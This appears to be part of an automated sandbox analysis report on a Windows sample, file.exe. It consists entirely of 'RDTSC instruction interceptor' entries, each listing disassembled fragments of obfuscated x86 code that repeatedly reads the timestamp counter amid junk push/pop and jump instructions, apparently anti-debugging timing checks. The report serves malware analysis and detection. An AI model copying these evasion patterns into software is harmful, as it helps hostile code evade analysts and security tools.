                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C62 second address: 446C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C67 second address: 446C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEC3D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446E2C second address: 446E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446E34 second address: 446E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446E53 second address: 446E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D706 second address: 43D70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D70F second address: 43D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEB1B16h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43D719 second address: 43D769 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F7E2CEC3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F7E2CEC3D36h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F7E2CEC3D48h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jmp 00007F7E2CEC3D3Dh 0x00000022 popad 0x00000023 js 00007F7E2CEC3D4Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F7E2CEC3D3Ah 0x00000030 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 414684 second address: 414688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447235 second address: 447245 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEC3D36h 0x00000008 jbe 00007F7E2CEC3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447245 second address: 44727F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CEB1B1Ch 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jbe 00007F7E2CEB1B29h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 ja 00007F7E2CEB1B16h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44727F second address: 44728A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44728A second address: 447290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447290 second address: 447294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447C23 second address: 447C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F7E2CEB1B3Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447C32 second address: 447C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447C36 second address: 447C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 447D84 second address: 447D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44D9EF second address: 44DA11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CEB1B25h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F7E2CEB1B16h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44DA11 second address: 44DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450007 second address: 45000D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45000D second address: 450012 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450264 second address: 450276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F7E2CEB1B18h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450276 second address: 450280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F7E2CEC3D36h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45473B second address: 45474D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453DCB second address: 453DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453DCF second address: 453DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453DD5 second address: 453E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F7E2CEC3D3Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453E04 second address: 453E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F7E2CEB1B16h 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4569DF second address: 456A08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEC3D38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEC3D48h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456A08 second address: 456A0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456A0E second address: 456A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456B13 second address: 456B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456CC4 second address: 456CE4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEC3D42h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456D98 second address: 456DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7E2CEB1B29h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456DBF second address: 456DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457438 second address: 457454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457454 second address: 45745A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45745A second address: 45745E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457543 second address: 457548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4577B5 second address: 4577E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEB1B26h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4577E3 second address: 4577E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4578C0 second address: 4578C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457DE1 second address: 457DF7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F7E2CEC3D3Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457DF7 second address: 457DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457DFB second address: 457E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, bx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7E2CEC3D38h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 add esi, dword ptr [ebp+122D24A6h] 0x0000002f push 00000000h 0x00000031 mov si, EBF1h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457E44 second address: 457E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 458749 second address: 458755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45861F second address: 458623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 458755 second address: 4587C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F7E2CEC3D36h 0x0000000c jo 00007F7E2CEC3D36h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7E2CEC3D38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1E0Eh], eax 0x00000035 mov dword ptr [ebp+12478C95h], esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F7E2CEC3D38h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 push 00000000h 0x00000059 push ecx 0x0000005a pop esi 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 pop edx 0x00000062 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4587C8 second address: 4587CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 458F13 second address: 458F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A1BF second address: 45A1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45AA89 second address: 45AA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B4E1 second address: 45B4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C023 second address: 45C047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F7E2CEC3D3Ch 0x00000012 pop ecx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CCC6 second address: 45CCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b jmp 00007F7E2CEB1B29h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jo 00007F7E2CEB1B1Ch 0x00000019 jl 00007F7E2CEB1B16h 0x0000001f push ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46108C second address: 461092 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461092 second address: 46109D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F7E2CEB1B16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46109D second address: 4610C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D38A3h], eax 0x0000000e push 00000000h 0x00000010 mov ebx, dword ptr [ebp+122D1D12h] 0x00000016 mov edi, dword ptr [ebp+1244B445h] 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D2E54h] 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4610C6 second address: 4610D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461FE8 second address: 46200B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D47h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46200B second address: 46209E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEB1B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F7E2CEB1B29h 0x00000011 nop 0x00000012 call 00007F7E2CEB1B24h 0x00000017 pushad 0x00000018 mov ch, 72h 0x0000001a mov si, 162Bh 0x0000001e popad 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+12472C0Ch], ebx 0x00000028 mov edi, dword ptr [ebp+122D2C8Ch] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F7E2CEB1B18h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D2EB8h] 0x00000050 xchg eax, esi 0x00000051 jmp 00007F7E2CEB1B22h 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b pop ebx 0x0000005c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 463016 second address: 46307E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7E2CEC3D38h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 or dword ptr [ebp+1244CEA9h], edx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F7E2CEC3D38h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 clc 0x00000047 mov dword ptr [ebp+122D1D43h], eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 je 00007F7E2CEC3D36h 0x00000057 pop edx 0x00000058 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622B9 second address: 4622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46307E second address: 463083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622BD second address: 4622C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622C1 second address: 4622C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46413F second address: 464149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4622C7 second address: 4622CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 466164 second address: 466168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 466168 second address: 4661AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F7E2CEC3D38h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov di, 29A1h 0x0000002a mov edi, edx 0x0000002c push 00000000h 0x0000002e jmp 00007F7E2CEC3D3Ch 0x00000033 push 00000000h 0x00000035 mov edi, ebx 0x00000037 push eax 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465383 second address: 465387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465387 second address: 465392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 467240 second address: 467268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ebx 0x0000000a mov edi, dword ptr [ebp+122D3760h] 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 movzx ebx, si 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D2193h], ebx 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F7E2CEB1B16h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 467268 second address: 46726C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46746D second address: 467476 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4683C0 second address: 4683DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEC3D3Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F7E2CEC3D3Eh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46C304 second address: 46C309 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46D1F8 second address: 46D27D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7E2CEC3D4Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7E2CEC3D44h 0x00000010 nop 0x00000011 mov di, AD1Dh 0x00000015 jmp 00007F7E2CEC3D44h 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D1D0Bh] 0x00000022 adc bl, FFFFFFF0h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F7E2CEC3D38h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 push eax 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 ja 00007F7E2CEC3D36h 0x0000004b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46D432 second address: 46D449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007F7E2CEB1B1Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46C44C second address: 46C450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
